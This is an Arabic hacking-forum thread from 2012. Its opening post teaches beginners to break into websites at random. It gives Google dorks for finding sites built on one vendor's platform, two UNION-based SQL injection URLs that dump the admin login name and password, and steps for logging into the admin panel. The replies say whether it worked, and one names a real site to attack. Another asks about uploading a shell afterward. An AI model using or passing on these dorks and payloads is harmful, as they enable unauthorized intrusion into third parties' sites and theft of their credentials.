المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : / Remote SQL Injection /ثغرة سهلة لاختراق موقع للمبتدئين



ArsHackEna
12-15-2012, 01:40 PM
سلام عليكم و رحمة الله وبركاته

اليوم فيه ثغرة سهلة لاخواننا المبتدئين و حتى لاخواننا الهكرز للاستفادة .......

و هدا اختراق عشوائي.......

أولا كي ما انسى ليكم الشرح بالفيديو انا وضعتو في اليتيوب و الوم راح اطلق الشرح و التطبيق

رابط الفيديو
http://www.youtube.com/watch?v=yNLcRGTSmNE

نبلش باسمـ الله الرحمان الرحيمـ

أولا ليكم الدورك

dorks:
inurl:index.php?SellerID=
inurl:supplier/index.php
intext"Development by WebDevelopmentHouse.com"

كود للكشف اليورز اي اسم دخول الادمن

buyers_subcategories.php?IndustryID=-2+/**/+Union/*!select*/1,2,LoginID from admin--

كود لكشف الباس اي كلمة السر

buyers_subcategories.php?IndustryID=-2+/**/+Union/*!select*/1,2,password from admin--

انسخ عندك كلمة السر و الباس

و مباشرة الى لوحة دخول الادمن للدخول اليها مباشر ليكم هيك

الموقع /www.oooo.com
نضيف للموقع كلمة admin

يطلع الموقع www.oooo.com/admin

ضع اليورز و الباس و انت عملت خطوة يا مبتدأ
لا تنسو للفهم الطريقة اكثر الدهاب الى الفيديو باليوتيوب للتفهم اكثر للطريقة
و ايضا لا تنسو التقيم تحياتي
تحـــــياتي ليكمـــ يا جيوش
AsrHEna
/Dz-Worm/

Hacker Rakan
12-15-2012, 02:29 PM
.. يعطيك الف عافيه أخوي لاهنت على المجهود الرائع منك
بس الحين دورت على الدورك بقوقل وطلعت الادمن والباس .. ويقولي خطا جربت يمكن 4 مواقع .. ~

Me$uT.dZ
12-15-2012, 11:49 PM
لم تشتغل معي :(

ArsHackEna
12-16-2012, 03:00 PM
.. يعطيك الف عافيه أخوي لاهنت على المجهود الرائع منك
بس الحين دورت على الدورك بقوقل وطلعت الادمن والباس .. ويقولي خطا جربت يمكن 4 مواقع .. ~

العفو حبيبي حبيبي ركز منيح و شوف المواقع المصابة و تاكد اوكل حبيبي

و موشكور على المرور تحياتي لك

- - - تم التحديث - - -


لم تشتغل معي :(

حبيبي ركز و جرب و تحقق كيف انا زبطت معي في التطبيق الموجود بالفيديو

MJNONFIK
12-16-2012, 04:21 PM
ما ظبطت معي بس مشكور

- - - تم التحديث - - -

تصحيح الثغره شغااااله

- - - تم التحديث - - -

لتجربه الثغره
http://www.minimaxonline.com

ArsHackEna
12-16-2012, 07:46 PM
ما ظبطت معي بس مشكور

- - - تم التحديث - - -

تصحيح الثغره شغااااله

- - - تم التحديث - - -

لتجربه الثغره
http://www.minimaxonline.com

العفو و الله حبيبي انا ضبطت مهي و انتو شفتوها في التطبيق على اليوتيوب

مشكوووور حبيبي

anwar hamo
12-18-2012, 02:20 AM
thanks:redface:

ANONYMOUS HACKER 1
12-21-2012, 03:43 PM
عاشت اديك يا مبدعه طريقه كلها صحيح
وشكرا على شرح

aymen cyril kamar
12-22-2012, 06:29 PM
mercci bcpp mon frere

- - - تم التحديث - - -

و لكن في سؤال في هذا النوع من الثغرات ترفع شيل عادي
بدوي اصافة كود ك سكربت ورد بريس

yamen cr hacker
12-22-2012, 08:17 PM
مشكو9و9و9و9و9و9و9و9و9و9وررر